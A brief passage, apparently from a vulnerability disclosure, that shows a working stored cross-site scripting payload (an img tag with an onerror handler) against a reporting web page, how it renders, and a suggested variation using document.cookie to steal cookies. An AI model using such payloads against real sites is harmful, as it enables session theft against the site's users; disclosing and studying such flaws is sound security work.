The following payload can be used to execute malicious JavaScript in the reporting web page:

<http://<img style="display:none" src=0 onerror="alert('XSS')">> 

It will be rendered as follows:

http://<img style="display:none" src=0 onerror="alert('XSS')"> 

This will execute an XSS alert when the user opens the report page here; the variations can be document.cookie to steal user cookies in one scenario.